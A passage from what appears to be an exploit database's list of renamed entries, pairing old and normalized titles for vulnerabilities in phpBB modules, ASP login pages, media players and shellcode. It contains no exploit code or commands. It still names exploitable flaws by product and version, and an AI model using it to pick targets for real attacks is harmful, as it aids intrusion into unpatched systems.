(3) phpBB 2.0.x - Authentication Bypass (1) phpBB 2.0.x - Authentication Bypass (2) phpBB 2.0.x - Authentication Bypass (3) PHPCOIN 1.2 - login.php Multiple Parameter Cross-Site Scripting PHPCOIN 1.2 - 'login.php' Multiple Parameter Cross-Site Scripting Multiple Vendor Telnet Client - Env_opt_add Heap-Based Buffer Overflow Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow PHPBB 2.0.13 DLMan Pro Module - SQL Injection PHPBB 2.0.13 Linkz Pro Module - SQL Injection phpBB 2.0.13 DLMan Pro Module - SQL Injection phpBB 2.0.13 Linkz Pro Module - SQL Injection PHPBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting PHPBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting phpBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting phpBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting Joomla S5 Clan Roster com_s5clanroster - 'index.php id parameter'SQL Injection Joomla S5 Clan Roster com_s5clanroster - 'index.php id parameter' SQL Injection PHPBB Remote - mod.php SQL Injection Datenbank Module For PHPBB - Remote mod.php Cross-Site Scripting phpBB Remote - mod.php SQL Injection Datenbank Module For phpBB - Remote mod.php Cross-Site Scripting PHPBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection PHPBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection PHPBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection phpBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection phpBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection RaidenFTPD 2.4 - Unauthorized File Access RaidenFTPd 2.4 - Unauthorized File Access CartWIZ 1.10 - login.asp Redirect Argument Cross-Site Scripting CartWIZ 1.10 - 'login.asp' Redirect Argument Cross-Site Scripting CartWIZ 1.10 - login.asp Message Argument Cross-Site Scripting CartWIZ 1.10 - 'login.asp' Message Argument Cross-Site Scripting PHPBB 2.0.x - profile.php Cross-Site Scripting PHPBB 2.0.x - viewtopic.php Cross-Site Scripting phpBB 2.0.x - profile.php Cross-Site Scripting phpBB 2.0.x - viewtopic.php Cross-Site Scripting Notes Module for PHPBB - SQL Injection Notes Module for phpBB - SQL Injection PHPCOIN 1.2 - login.php PHPcoinsessid Parameter SQL Injection PHPCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection CodetoSell ViArt Shop Enterprise 2.1.6 - page.php page Parameter Cross-Site Scripting CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php' page Parameter Cross-Site Scripting PHPBB 2.0.x - URL Tag BBCode.php phpBB 2.0.x - URL Tag BBCode.php Active News Manager - login.asp SQL Injection Active News Manager - 'login.asp' SQL Injection FunkyASP AD Systems 1.1 - login.asp SQL Injection FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack Based Overflow OS4E - login.asp SQL Injection OS4E - 'login.asp' SQL Injection JiRo's Upload System 1.0 - login.asp SQL Injection NEXTWEB - (i)Site login.asp SQL Injection JiRo's Upload System 1.0 - 'login.asp' SQL Injection NEXTWEB - (i)Site 'login.asp' SQL Injection Livingcolor Livingmailing 1.3 - login.asp SQL Injection Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection WWWeb Concepts Events System 1.0 - login.asp SQL Injection WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection Cool Cafe Chat 1.2.1 - login.asp SQL Injection Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection LaGarde StoreFront 5.0 Shopping Cart - login.asp SQL Injection LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection Ipswitch WhatsUp Professional 2005 SP1 - login.asp SQL Injection Ipswitch WhatsUp Professional 2005 SP1 - 'login.asp' SQL Injection Dynamic Biz Website Builder (QuickWeb) 1.0 - login.asp SQL Injection Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' SQL Injection PHPWebsite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal Cuppa CMS - 'alertConfigField.php urlConfig parameter'Remote / Local File Inclusion Cuppa CMS - 'alertConfigField.php urlConfig parameter' Remote / Local File Inclusion VBZoom 1.0/1.11 - login.php UserID Parameter Cross-Site Scripting VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting PHP Lite Calendar Express 2.2 - login.php cid Parameter SQL Injection PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection ATutor 1.5.1 - login.php course Parameter Cross-Site Scripting ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting Adrenalin Player 2.2.5.3 - '.wax'SEH Buffer Overflow Adrenalin Player 2.2.5.3 - '.wax' SEH Buffer Overflow PHPwcms 1.2.5 -DEV - login.php form_lang Parameter Traversal Arbitrary File Access PHPwcms 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access AVS Media Player 4.1.11.100 - '.ac3'Denial of Service AVS Media Player 4.1.11.100 - '.ac3' Denial of Service Adrenalin Player 2.2.5.3 - '.wvx'SEH Buffer Overflow Adrenalin Player 2.2.5.3 - '.wvx' SEH Buffer Overflow WinAmp 5.63 - Stack-based Buffer Overflow WinAmp 5.63 - Stack Based Buffer Overflow PHPX 3.5.x - Admin login.php SQL Injection PHPX 3.5.x - Admin 'login.php' SQL Injection DRZES Hms 3.2 - login.php Cross-Site Scripting DRZES Hms 3.2 - 'login.php' Cross-Site Scripting PortalApp 3.3/4.0 - login.asp Cross-Site Scripting SiteEnable 3.3 - login.asp Cross-Site Scripting IntranetApp 3.3 - login.asp ret_page Parameter Cross-Site Scripting PortalApp 3.3/4.0 - 'login.asp' Cross-Site Scripting SiteEnable 3.3 - 'login.asp' Cross-Site Scripting IntranetApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting ProjectApp 3.3 - login.asp ret_page Parameter Cross-Site Scripting ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting VbsEdit 5.9.3 - '.smi'Buffer Overflow VbsEdit 5.9.3 - '.smi' Buffer Overflow Artweaver 3.1.5 - '.awd'Buffer Overflow Artweaver 3.1.5 - '.awd' Buffer Overflow XnView 2.03 - '.pct'Buffer Overflow XnView 2.03 - '.pct' Buffer Overflow aoblogger 2.3 - login.php username Field SQL Injection aoblogger 2.3 - 'login.php' username Field SQL Injection WebspotBlogging 3.0 - login.php SQL Injection WebspotBlogging 3.0 - 'login.php' SQL Injection miniBloggie 1.0 - login.php SQL Injection miniBloggie 1.0 - 'login.php' SQL Injection ASPThai Forums 8.0 - login.asp SQL Injection ASPThai Forums 8.0 - 'login.asp' SQL Injection Windows RT ARM - Bind Shell (Port 4444) shellcode Windows RT ARM - Bind Shell (Port 4444) Shellcode Virtual Hosting Control System 2.2/2.4 - login.php check_login() Function Authentication Bypass Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass Siteframe Beaumont 5.0.1/5.0.2 - page.php HTML Injection Siteframe Beaumont 5.0.1/5.0.2 - 'page.php' HTML Injection Ginkgo CMS - 'index.php rang parameter'SQL Injection Ginkgo CMS - 'index.php rang parameter' SQL Injection Game-Panel 2.6 - login.php Cross-Site Scripting Game-Panel 2.6 - 'login.php' Cross-Site Scripting QwikiWiki 1.4/1.5 - login.php Multiple Parameter Cross-Site Scripting QwikiWiki 1.4/1.5 - 'login.php' Multiple Parameter Cross-Site Scripting PHPWebsite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection PHPWebsite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection PhxContacts 0.93 - login.php Cross-Site Scripting PhxContacts 0.93 - 'login.php' Cross-Site Scripting MLMAuction Script - 'gallery.php id parameter'SQL Injection MLMAuction Script - 'gallery.php id parameter' SQL Injection RedCMS 0.1 - login.php Multiple Parameter SQL Injection RedCMS 0.1 - 'login.php' Multiple Parameter SQL Injection ShopWeezle 2.0 - login.php itemID Parameter SQL Injection ShopWeezle 2.0 - 'login.php' itemID Parameter SQL Injection ContentBoxx - login.php Cross-Site Scripting ContentBoxx - 'login.php' Cross-Site Scripting PHPBB Chart Mod 1.1 - charts.php id Parameter SQL Injection phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection PHPBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion JSBoard 2.0.10/2.0.11 - login.php Cross-Site Scripting JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting CyberBuild - login.asp SessionID Parameter SQL Injection CyberBuild - 'login.asp' SessionID Parameter SQL Injection CyberBuild - login.asp SessionID Parameter Cross-Site Scripting CyberBuild - 'login.asp' SessionID Parameter Cross-Site Scripting PHPBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting PHPBB 2.0.20 - Unauthorized HTTP Proxy phpBB 2.0.20 - Unauthorized HTTP Proxy PHPBB 2.0.x - template.php Remote File Inclusion phpBB 2.0.x - template.php Remote File Inclusion PHPBB - BBRSS.php Remote File Inclusion RahnemaCo - page.php Remote File Inclusion phpBB - BBRSS.php Remote File Inclusion RahnemaCo - 'page.php' Remote File Inclusion BlueDragon Server 6.2.1 - '.cfm'Denial of Service BlueDragon Server 6.2.1 - '.cfm' Denial of Service MyMail 1.0 - login.php Cross-Site Scripting MyMail 1.0 - 'login.php' Cross-Site Scripting Woltlab Burning Board FLVideo Addon - 'video.php value parameter'SQL Injection Woltlab Burning Board FLVideo Addon - 'video.php value parameter' SQL Injection PHPBB 1.2.4 For Mambo - Multiple Remote File Inclusion phpBB 1.2.4 For Mambo - Multiple Remote File Inclusion PHPbb-auction 1.x - auction_room.php ar Parameter SQL Injection PHPbb-auction 1.x - auction_store.php u Parameter SQL Injection phpBB-auction 1.x - auction_room.php ar Parameter SQL Injection phpBB-auction 1.x - auction_store.php u Parameter SQL Injection Linux/x86 - Multi-Egghunter shellcode Linux/x86 - Multi-Egghunter Shellcode Jamroom 3.0.16 - login.php Cross-Site Scripting Jamroom 3.0.16 - 'login.php' Cross-Site Scripting DCP-Portal 6.0 - login.php username Parameter SQL Injection DCP-Portal 6.0 - 'login.php' username Parameter SQL Injection PhpBB XS 0.58 - Multiple Remote File Inclusion phpBB XS 0.58 - Multiple Remote File Inclusion AckerTodo 4.2 - login.php Multiple SQL Injection AckerTodo 4.2 - 'login.php' Multiple SQL Injection PHPWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion PHPBB Add Name Module - Not_Mem.php Remote File Inclusion IcoFX 2.5.0.0 - '.ico'Buffer Overflow phpBB Add Name Module - Not_Mem.php Remote File Inclusion IcoFX 2.5.0.0 - '.ico' Buffer Overflow Evandor Easy notesManager 0.0.1 - login.php username Parameter SQL Injection Evandor Easy notesManager 0.0.1 - 'login.php' username Parameter SQL Injection AIOCP 1.3.x - cp_forum_view.php Multiple Parameter Cross-Site Scripting AIOCP 1.3.x - cp_dpage.php choosed_language Parameter Cross-Site Scripting AIOCP 1.3.x - cp_show_ec_products.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - cp_users_online.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - cp_links_search.php orderdir Parameter Cross-Site Scripting AIOCP 1.3.x - /admin/code/index.php load_page Parameter Remote File Inclusion AIOCP 1.3.x - cp_dpage.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_news.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_forum_view.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_edit_user.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_newsletter.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_links.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_contact_us.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_show_ec_products.php Multiple Parameter SQL Injection AIOCP 1.3.x - cp_login.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_users_online.php order_field Parameter SQL Injection AIOCP 1.3.x - cp_codice_fiscale.php choosed_language Parameter SQL Injection AIOCP 1.3.x - cp_links_search.php orderdir Parameter SQL Injection AIOCP 1.3.x - cp_dpage.php Full Path Disclosure AIOCP 1.3.x - cp_show_ec_products.php Full Path Disclosure AIOCP 1.3.x - cp_show_page_help.php Full Path Disclosure AIOCP 1.3.x - 'cp_forum_view.php' Multiple Parameter Cross-Site Scripting Windows x86 - Persistent Reverse Shell TCP (494 Bytes) AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_show_ec_products.php' order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_users_online.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter Cross-Site Scripting AIOCP 1.3.x - '/admin/code/index.php' load_page Parameter Remote File Inclusion AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_news.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_edit_user.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_newsletter.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_links.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_contact_us.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_show_ec_products.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_login.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure INFINICART - login.asp Multiple Parameter Cross-Site Scripting INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Inclusion Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion SIAP CMS - login.asp SQL Injection SIAP CMS - 'login.asp' SQL Injection AppIntellect SpotLight CRM - login.asp SQL Injection AppIntellect SpotLight CRM - 'login.asp' SQL Injection DMXReady Secure Login Manager 1.0 - login.asp sent Parameter SQL Injection DMXReady Secure Login Manager 1.0 - 'login.asp' sent Parameter SQL Injection PHPBB 2.0.21 - privmsg.php HTML Injection phpBB 2.0.21 - privmsg.php HTML Injection Indexu 5.0/5.3 - login.php error_msg Parameter Cross-Site Scripting Indexu 5.0/5.3 - 'login.php' error_msg Parameter Cross-Site Scripting myBloggie 2.1.5 - login.php PATH_INFO Parameter Cross-Site Scripting myBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting Avira Secure Backup 1.0.0.1 Build 3616 - '.reg'Buffer Overflow Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow Boilsoft RM TO MP3 Converter 1.72 - Crash PoC '.wav' Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC Tyger Bug Tracking System 1.1.3 - login.php PATH_INFO Parameter Cross-Site Scripting Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting Horde Framework 3.1.3 - login.php Cross-Site Scripting Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting PHPStats 0.1.9 - Multiple SQL Injections PHPStats 0.1.9 - PHP-Stats-options.php Remote Code Execution phpStats 0.1.9 - Multiple SQL Injections phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution Free File Hosting System 1.1 - login.php AD_BODY_TEMP Parameter Remote File Inclusion Free File Hosting System 1.1 - 'login.php' AD_BODY_TEMP Parameter Remote File Inclusion DeskPro 2.0.1 - login.php HTML Injection DeskPro 2.0.1 - 'login.php' HTML Injection plesk 8.1.1 - login.php3 Directory Traversal plesk 8.1.1 - 'login.php3' Directory Traversal Ahhp Portal - page.php Multiple Remote File Inclusion Ahhp Portal - 'page.php' Multiple Remote File Inclusion Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion Campsite 2.6.1 - ' LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion Campsite 2.6.1 - ' LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion PHPPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting Maia Mailguard 1.0.2 - login.php Multiple Local File Inclusion Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusion Nukedit 4.9.x - login.asp Cross-Site Scripting Nukedit 4.9.x - 'login.asp' Cross-Site Scripting Pay Roll Time Sheet and Punch Card Application With Web UI - login.asp SQL Injection Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp'Version Attribute Buffer Overflow RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow PHPGedView 4.1 - login.php Cross-Site Scripting PHPGedView 4.1 - 'login.php' Cross-Site Scripting E-Smart Cart 1.0 - login.asp SQL Injection AkkyWareHOUSE 7-zip32.dll 4.42 - Heap-Based Buffer Overflow E-Smart Cart 1.0 - 'login.asp' SQL Injection AkkyWareHOUSE 7-zip32.dll 4.42 - Heap Based Buffer Overflow SWSoft Plesk 8.2 - login.php3 PLESKSESSID Cookie SQL Injection SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection AfterLogic MailBee WebMail Pro 3.x - login.php mode Parameter Cross-Site Scripting AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting Miro Broadcast Machine 0.9.9 - login.php Cross-Site Scripting Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting JiRo's Banner System 2.0 - login.asp Multiple SQL Injection JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection WinUAE 1.4.4 - 'zfile.c' Stack-Based Buffer Overflow WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 - ActiveX Control Buffer Overflow Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow MuPDF 1.3 - Stack-based Buffer Overflow in xps_parse_color() MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color() Android Web Browser - GIF File Heap-Based Buffer Overflow Android Web Browser - GIF File Heap Based Buffer Overflow NCH Software Express Burn Plus 4.68 - '.EBP'Project File Buffer Overflow NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow PHPstats 0.1_alpha - 'PHPstats.php' Cross-Site Scripting phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting Publish-It 3.6d - '.pui'SEH Buffer Overflow Publish-It 3.6d - '.pui' SEH Buffer Overflow LeadTools Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities PHPBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion LeadTools Multimedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion PHPBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion EsContacts 1.0 - login.php msg Parameter Cross-Site Scripting EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting NASA Ames Research Center BigView 1.8 - '.PNM'Stack-Based Buffer Overflow NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow PHP Ticket System Beta 1 - 'get_all_created_by_user.php id parameter'SQL Injection PHP Ticket System Beta 1 - 'get_all_created_by_user.php id parameter' SQL Injection VCDGear 3.50 - '.cue'Stack Buffer Overflow VCDGear 3.50 - '.cue' Stack Buffer Overflow FaName 1.0 - page.php name Parameter Cross-Site Scripting FaName 1.0 - 'page.php' name Parameter Cross-Site Scripting TGS Content Management 0.3.2r2 - login.php Multiple Parameter Cross-Site Scripting TGS Content Management 0.3.2r2 - 'login.php' Multiple Parameter Cross-Site Scripting Claroline 1.8.9 - PHPbb/newtopic.php URL Cross-Site Scripting Claroline 1.8.9 - PHPbb/reply.php URL Cross-Site Scripting Claroline 1.8.9 - PHPbb/viewtopic.php URL Cross-Site Scripting Claroline 1.8.9 - phpBB/newtopic.php URL Cross-Site Scripting Claroline 1.8.9 - phpBB/reply.php URL Cross-Site Scripting Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting Trixbox - 'endpoint_aastra.php mac parameter'Remote Code Injection Trixbox - 'endpoint_aastra.php mac parameter' Remote Code Injection Free Download Manager - Stack-based Buffer Overflow Free Download Manager - Stack Based Buffer Overflow XRms 1.99.2 - login.php target Parameter Cross-Site Scripting XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service Microsoft DebugDiag 1.0 - ' CrashHangExt.dll' ActiveX Control Remote Denial of Service PHPWebSite 0.9.3 - 'links.php' SQL Injection phpWebSite 0.9.3 - 'links.php' SQL Injection Easyedit CMS - page.php intPageID Parameter SQL Injection Easyedit CMS - 'page.php' intPageID Parameter SQL Injection aMSN - '.ctt'Remote Denial of Service aMSN - '.ctt' Remote Denial of Service 68 Classifieds 4.1 - login.php goto Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting ProFTPD 1.3 - 'mod_sql' Username SQL Injection ProFTPd 1.3 - 'mod_sql' Username SQL Injection LinPHA 1.3.2/1.3.3 - login.php Cross-Site Scripting LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting Recover Data for Novell Netware 1.0 - '.sav'Remote Denial of Service Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service J. River Media Jukebox 12 - '.mp3'Remote Heap Buffer Overflow J. River Media Jukebox 12 - '.mp3' Remote Heap Buffer Overflow Invision Power Board 3.0.3 - '.txt'MIME-Type Cross-Site Scripting Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting OpenOffice 3.1 - '.csv'Remote Denial of Service OpenOffice 3.1 - '.csv' Remote Denial of Service OpenOffice 3.1 - '.slk'NULL Pointer Dereference Remote Denial of Service OpenOffice 3.1 - '.slk' NULL Pointer Dereference Remote Denial of Service BS.Player 2.51 - '.mp3'Buffer Overflow BS.Player 2.51 - '.mp3' Buffer Overflow netKar PRO 1.1 - '.nkuser'File Creation NULL Pointer Denial Of Service netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Aqua Real Screensaver - '.ar'Buffer Overflow Aqua Real Screensaver - '.ar' Buffer Overflow Mthree Development MP3 to WAV Decoder - '.mp3'Remote Buffer Overflow Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow Sonique 2.0 - '.xpl'Remote Stack-Based Buffer Overflow Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow Property Watch - login.php redirect Parameter Cross-Site Scripting Property Watch - 'login.php' redirect Parameter Cross-Site Scripting Xilisoft Video Converter 3.1.8.0720b - '.ogg'Buffer Overflow Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow Mulitple Wordpress Themes - 'admin-ajax.php img parameter'Arbitrary File Download Mulitple Wordpress Themes - 'admin-ajax.php img parameter' Arbitrary File Download Crystal Player 1.98 - '.mls'Buffer Overflow Crystal Player 1.98 - '.mls' Buffer Overflow Wordpress Acento Theme - 'view-pdf.php file parameter'Arbitrary File Download Wordpress Acento Theme - 'view-pdf.php file parameter' Arbitrary File Download GreenBrowser - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution GreenBrowser - 'RSRC32.dll' DLL Loading Arbitrary Code Execution DragDropCart - login.php redirect Parameter Cross-Site Scripting DragDropCart - 'login.php' redirect Parameter Cross-Site Scripting Microsoft Bluetooth Personal Area Networking - 'BthPan.sys'Privilege Escalation Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Privilege Escalation WordPress RB Agency Plugin 2.4.7 - Local File Disclosure Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax'Buffer Overflow/Denial of Service EIP Overwrite Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite Wireshark 1.4.3 - '.pcap'Memory Corruption Wireshark 1.4.3 - '.pcap' Memory Corruption Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax'SEH Buffer Overflow Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' SEH Buffer Overflow KMPlayer 2.9.3.1214 - '.ksf'Remote Buffer Overflow DivX Player 6.x - '.dps'Remote Buffer Overflow KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow DivX Player 6.x - '.dps' Remote Buffer Overflow VLC Media Player 1.0.5 - '.ape'Denial of Service VLC Media Player 1.0.5 - '.ape' Denial of Service RealPlayer 11 - '.rmp'Remote Buffer Overflow RealPlayer 11 - '.rmp' Remote Buffer Overflow Advantech AdamView 4.30.003 - '.gni'SEH Buffer Overflow Advantech AdamView 4.30.003 - '.gni' SEH Buffer Overflow FLVPlayer4Free 2.9 - '.fp4f'Remote Buffer Overflow FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow eXPert PDF 7.0.880.0 - '.pj'Heab-based Buffer Overflow eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow PHPWebSite 1.7.1 - 'upload.php' Arbitrary File Upload phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution PHPWebSite 1.7.1 - 'mod.php' SQL Injection phpWebSite 1.7.1 - 'mod.php' SQL Injection Linux/x86 - custom execve-shellcode Encoder/Decoder Linux/x86 - custom execve-Shellcode Encoder/Decoder ProFTPd 1.3.5 (mod_copy) - Remote Command Execution ProFTPd 1.3.5 - (mod_copy) Remote Command Execution ProFTPD 1.3.5 - Mod_Copy Command Execution ProFTPd 1.3.5 - 'Mod_Copy' Command Execution Linux/x86 - Download & Execute shellcode Linux/x86 - Download & Execute Shellcode Adobe Flash - Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec Adobe Flash - Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File Valhala Honeypot 1.8 - Stack-Based Buffer Overflow Valhala Honeypot 1.8 - Stack Based Buffer Overflow Microsoft Office 2007 - Malformed Document Stack-Based Buffer Overflow Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass WebKit Cross-Site Scripting Filter - ' Cross-Site ScriptingAuditor.cpp' Security Bypass Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow Mpxplay Multimedia Commander 2.00a - .m3u Stack Based Buffer Overflow Linux/x86-64 - /bin/sh shellcode Linux/x86-64 - /bin/sh Shellcode Last PassBroker 3.2.16 - Stack-Based Buffer Overflow Last PassBroker 3.2.16 - Stack Based Buffer Overflow C2 WebResource - 'File' Parameter Cross-Site Scripting C2 WebResource - ' File' Parameter Cross-Site Scripting SmallFTPD - Unspecified Denial of Service SmallFTPd - Unspecified Denial of Service VLC 2.2.1 libvlccore - '.mp3'Stack Overflow VLC 2.2.1 libvlccore - '.mp3' Stack Overflow FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read FBZX 2.10 - Local Stack-Based Buffer Overflow FBZX 2.10 - Local Stack Based Buffer Overflow TACK 1.07 - Local Stack-Based Buffer Overflow TACK 1.07 - Local Stack Based Buffer Overflow Dynamic Biz Website Builder (QuickWeb) 1.0 - login.asp Multiple Field SQL Injection Authentication Bypass Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass Wireshark - iseries_parse_packet Heap-Based Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack-Based Buffer Overflow Wireshark - 